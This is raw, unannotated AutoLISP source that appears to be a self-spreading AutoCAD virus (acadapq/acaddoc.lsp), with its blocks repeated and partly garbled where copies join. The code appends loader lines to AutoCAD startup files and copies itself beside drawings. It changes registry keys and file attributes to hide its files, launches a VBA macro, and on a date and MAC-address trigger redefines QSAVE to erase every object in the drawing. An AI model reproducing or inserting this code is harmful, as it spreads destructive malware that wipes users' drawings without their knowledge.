"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
